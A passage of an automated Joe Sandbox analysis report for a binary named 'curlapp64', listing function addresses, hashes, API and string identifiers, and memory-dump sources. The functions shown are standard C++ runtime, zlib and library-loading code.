                                                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                  • String ID: Negative width.$Number is too big.$Width is not an integer.
                                                                                                                                                                                                  • API String ID: 3237623162-431172999
                                                                                                                                                                                                  • Opcode ID: 112e83678d0f62b29817e72276de694e4c1ab3b3ce6967d91586d6c6608d8f30
                                                                                                                                                                                                  • Instruction ID: 23e1d206aca3d7e38e698573cb2dd72e7b4f76c7254aef33ab09f9073a801a4b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 112e83678d0f62b29817e72276de694e4c1ab3b3ce6967d91586d6c6608d8f30
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D1316F52D0C1874FFD89AF38645A0B83B90AF62746F6A4835D3DCC259FAD0E6A458273
                                                                                                                                                                                                  Function 00007FF6CF97AFB0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                  • String ID: ZYo
                                                                                                                                                                                                  • API String ID: 2081738530-278324492
                                                                                                                                                                                                  • Opcode ID: 4ff97662dace67d27204c207221ef1c788e69578d639497f0a6820352d3adf17
                                                                                                                                                                                                  • Instruction ID: 0dc2e6df199aa1dd8ede5188098082898b9c03b2ddcad52edb098dbabcaccdb8
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4ff97662dace67d27204c207221ef1c788e69578d639497f0a6820352d3adf17
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7D318322A08B4285EE25DF15F4501BAB3A0FB85B95F481132DEDE837AEDE3CE441C720
                                                                                                                                                                                                  Function 00007FF6CF9793C0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                  • String ID: ZYo
                                                                                                                                                                                                  • API String ID: 2081738530-278324492
                                                                                                                                                                                                  • Opcode ID: 6d4b3a52c4b12448916403d88c508dc28976cb80c7b7da730723599f30e9cb9d
                                                                                                                                                                                                  • Instruction ID: 5842916277c9d86ba1c33ee931d48d3dd37711a4d58596859409720e460de56d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6d4b3a52c4b12448916403d88c508dc28976cb80c7b7da730723599f30e9cb9d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F1315232A08B42C5EF25DF56E44057963A0FB89BA5F480532DACE877AADE3CE441C720
                                                                                                                                                                                                  Function 00007FF6CF9AD510 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 490COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                  • String ID: f$p$p
                                                                                                                                                                                                  • API String ID: 3215553584-1995029353
                                                                                                                                                                                                  • Opcode ID: 503dcef08136149afe9eb2ad72f42d8d7df428959b37cc8a53cf2ffc9b55751f
                                                                                                                                                                                                  • Instruction ID: 0c60cc0845175ccf92702aef9447dd33a959950b7343b7a8a9cc3fbf386ac51c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 503dcef08136149afe9eb2ad72f42d8d7df428959b37cc8a53cf2ffc9b55751f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: EE127EA5E0D24386FF64AE1490543B977E2EB80756F844137E6C9876EEDF7CE5808B20
                                                                                                                                                                                                  Function 00007FF6CF9A6E80 Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 320COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                                                                                                                                                                  • String ID: csm$csm$csm$ZYo
                                                                                                                                                                                                  • API String ID: 3523768491-443663966
                                                                                                                                                                                                  • Opcode ID: aac434d52fbaaa1f9ad8c2f7d5d4873a533c8f2939eead5de051d543cd90492c
                                                                                                                                                                                                  • Instruction ID: 4960955ae9f7c6fa6d3b54d9ca97f072f4aba4487f8683039555ff106b4b3833
                                                                                                                                                                                                  • Opcode Fuzzy Hash: aac434d52fbaaa1f9ad8c2f7d5d4873a533c8f2939eead5de051d543cd90492c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F8E1AD32E08A828AEB61DF34D4852AD37E0FB44749F114136EECD9769ADF38E481C761
                                                                                                                                                                                                  Function 00007FF6CF9BA958 Relevance: 10.8, APIs: 7, Instructions: 293COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                                  • Opcode ID: 49917cc059df20039e06e468b0b7f2b4a114a198367806555f205db337605268
                                                                                                                                                                                                  • Instruction ID: 6820dbe6b9767adbe0972689045a0d5566d6617623c208e423e6dd16a4aac994
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 49917cc059df20039e06e468b0b7f2b4a114a198367806555f205db337605268
                                                                                                                                                                                                  • Instruction Fuzzy Hash: ADC1E622A0C78642EF749F1590442BDBBA1FB80B92F554535DECE8379BDE7CE8498720
                                                                                                                                                                                                  Function 00007FF8B9F66E40 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 142stringCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165900335.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165771310.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165938811.00007FF8B9F6F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165963780.00007FF8B9F77000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b9f60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _write$_errnomemsetstrerror
                                                                                                                                                                                                  • String ID: internal error: deflate stream corrupt
                                                                                                                                                                                                  • API String ID: 101764657-3609297558
                                                                                                                                                                                                  • Opcode ID: 0721d50ef3e274cebcdc975a975a7d652a7a70e2e80f9c972380d3921c994e9c
                                                                                                                                                                                                  • Instruction ID: de6d86aaa821dd07b16e726c3a95a999617dbe1e8c35015f0cb9310688699c38
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0721d50ef3e274cebcdc975a975a7d652a7a70e2e80f9c972380d3921c994e9c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 95519C32A0878293DB189F6ED55023937A1FB45BFAF14A235DB1A43794DF38E8A1C340
                                                                                                                                                                                                  Function 00007FF6CF97BE30 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 126COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: std::_$Lockit$GetcollLocinfo::_Locinfo_ctorLockit::_Lockit::~__invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                  • String ID: bad locale name
                                                                                                                                                                                                  • API String ID: 3908275632-1405518554
                                                                                                                                                                                                  • Opcode ID: e07bf025eb17b4c263de924eba2429197c001596c59850071b89941cc3c22796
                                                                                                                                                                                                  • Instruction ID: 7fefa789e6555334f69548d5f2c8db73283b15b4be31cde939271b51b3145047
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e07bf025eb17b4c263de924eba2429197c001596c59850071b89941cc3c22796
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C1517B22F19B818AFF14EFB1D4502AC33A1EF45B49F045035DE8DA7A9EDE38D45183A4
                                                                                                                                                                                                  Function 00007FF6CF971D30 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 124COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: __std_exception_copy_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                  • String ID: ios_base::failbit set$ZYo
                                                                                                                                                                                                  • API String ID: 1109970293-2339876564
                                                                                                                                                                                                  • Opcode ID: 890ea59beb20f34ae2b6416092b2e74fee24d137ec1d7c672ed5399698c4e44a
                                                                                                                                                                                                  • Instruction ID: 44e88ae00bb348803b348c3e2f8b1248203439ba06a07c0c28401bcd667392bb
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 890ea59beb20f34ae2b6416092b2e74fee24d137ec1d7c672ed5399698c4e44a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9D519362E18BC581EF119F24E4413A96360FF99795F519332D6DD827AAEF2CE1D4C310
                                                                                                                                                                                                  Function 00007FF6CF99CAE0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 121COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                  • String ID: Invalid fill (too long).$Invalid format string.$invalid fill character '{'
                                                                                                                                                                                                  • API String ID: 909987262-2189586557
                                                                                                                                                                                                  • Opcode ID: f559ccee564772a3e08e28e57cc904f5b370a393d2fd08c898030f8cb87c8c2a
                                                                                                                                                                                                  • Instruction ID: d6e92d9e763c78c5ed769231141357fae9f1f34f115e7b93e689f0484b3e286a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f559ccee564772a3e08e28e57cc904f5b370a393d2fd08c898030f8cb87c8c2a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2F410B22F0C5978AEE249F49D8100B97791EF54BC5F9A4432DACC8779EDE2CE641C360
                                                                                                                                                                                                  Function 00007FF6CF9A92DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,?,?,00007FF6CF9A958E,?,?,?,00007FF6CF9A9280,?,?,?,00007FF6CF9A5E61), ref: 00007FF6CF9A9361
                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00007FF6CF9A958E,?,?,?,00007FF6CF9A9280,?,?,?,00007FF6CF9A5E61), ref: 00007FF6CF9A936F
                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,?,?,00007FF6CF9A958E,?,?,?,00007FF6CF9A9280,?,?,?,00007FF6CF9A5E61), ref: 00007FF6CF9A9399
                                                                                                                                                                                                  • FreeLibrary.KERNEL32(?,?,?,00007FF6CF9A958E,?,?,?,00007FF6CF9A9280,?,?,?,00007FF6CF9A5E61), ref: 00007FF6CF9A9407
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,?,?,00007FF6CF9A958E,?,?,?,00007FF6CF9A9280,?,?,?,00007FF6CF9A5E61), ref: 00007FF6CF9A9413
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                  • String ID: api-ms-
                                                                                                                                                                                                  • API String ID: 2559590344-2084034818
                                                                                                                                                                                                  • Opcode ID: a782d08a5ee46e8e1779692487f4e335f97326f40c204a8a276b8c1220764adc
                                                                                                                                                                                                  • Instruction ID: 9910defe915ea8b5177bd1e2f7fe0637fabbd419d06b1c0692e6d29188f085f1
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a782d08a5ee46e8e1779692487f4e335f97326f40c204a8a276b8c1220764adc
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5B31C421E1AF4291EF129F12A8405B963E4BF44B66F4A0535DD9E8779AEF3CE444C720
                                                                                                                                                                                                  Function 00007FF8B9F66BD0 Relevance: 10.6, APIs: 4, Strings: 3, Instructions: 72COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,00007FF8B9F66A21,?,00000000), ref: 00007FF8B9F66BEA
                                                                                                                                                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,00007FF8B9F66A21), ref: 00007FF8B9F66C34
                                                                                                                                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B9F66C93
                                                                                                                                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,00007FF8B9F66A21), ref: 00007FF8B9F66C9D
                                                                                                                                                                                                    • Part of subcall function 00007FF8B9F65230: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B9F6525D
                                                                                                                                                                                                    • Part of subcall function 00007FF8B9F65230: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B9F652C0
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165900335.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165771310.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165938811.00007FF8B9F6F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165963780.00007FF8B9F77000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b9f60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: freemalloc
                                                                                                                                                                                                  • String ID: 1.3.1$X$out of memory
                                                                                                                                                                                                  • API String ID: 3061335427-2920223590
                                                                                                                                                                                                  • Opcode ID: 4930c30deb11aaabf8b17e15af49810dea7ccbc60d3a8d34e3ce465ff62fdd26
                                                                                                                                                                                                  • Instruction ID: 371b3996068e5111e10cfa06e2f1c04fb32f832314807a5d893ae59eec986935
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4930c30deb11aaabf8b17e15af49810dea7ccbc60d3a8d34e3ce465ff62fdd26
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 16314B32608B818AD760CF69E44026973B4FB48BA5F145235DB9E43798DF3CE859C740
                                                                                                                                                                                                  Function 00007FF6CF9C4488 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                  • String ID: CONOUT$
                                                                                                                                                                                                  • API String ID: 3230265001-3130406586
                                                                                                                                                                                                  • Opcode ID: 6997d0cb888ded036fbdf69dac13bbeb53c113875ad6812d165759a6759693e9
                                                                                                                                                                                                  • Instruction ID: 57b8569729849ef0d4d383a744d9f876ad04ba9a731002bf8e9cdd668f38ce94
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6997d0cb888ded036fbdf69dac13bbeb53c113875ad6812d165759a6759693e9
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1E11D022B18B8182EB509F46F844369B7A0FB88BE6F110234EE9EC3799CF7CD4548750
                                                                                                                                                                                                  Function 00007FF6CF9AA4C0 Relevance: 9.2, APIs: 6, Instructions: 156COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                                  • Opcode ID: fcc6ca6c3c979c9f973a8974cb8edb93fcef3ba0881d5024cae7a594c39b033d
                                                                                                                                                                                                  • Instruction ID: fecacffa61f865bee9d00b7b1b111dac6213194fdc7278bef0d7ced1dba5b8d3
                                                                                                                                                                                                  • Opcode Fuzzy Hash: fcc6ca6c3c979c9f973a8974cb8edb93fcef3ba0881d5024cae7a594c39b033d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 15517022D09686C7EF669F25D0602BDB7E1AF42F45F489031C6CC8738BDE2E9845C726
                                                                                                                                                                                                  Function 00007FF6CF978A10 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 339COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$ZYo
                                                                                                                                                                                                  • API String ID: 0-1715687113
                                                                                                                                                                                                  • Opcode ID: a1a3ca7c02371a01c10e6f849ea0af1995ee6e458b9c550de0073c7ebd3068b2
                                                                                                                                                                                                  • Instruction ID: 9d508218386189e97a1aed0b1871eb076b296ab8f24798e3046f44d96f4a7b6b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a1a3ca7c02371a01c10e6f849ea0af1995ee6e458b9c550de0073c7ebd3068b2
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 91E18862B08B8185FF118F25D4442BD27A2FB44B89F688536CB9D57B9EDF38E494C360
                                                                                                                                                                                                  Function 00007FF6CF9950B0 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 337COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
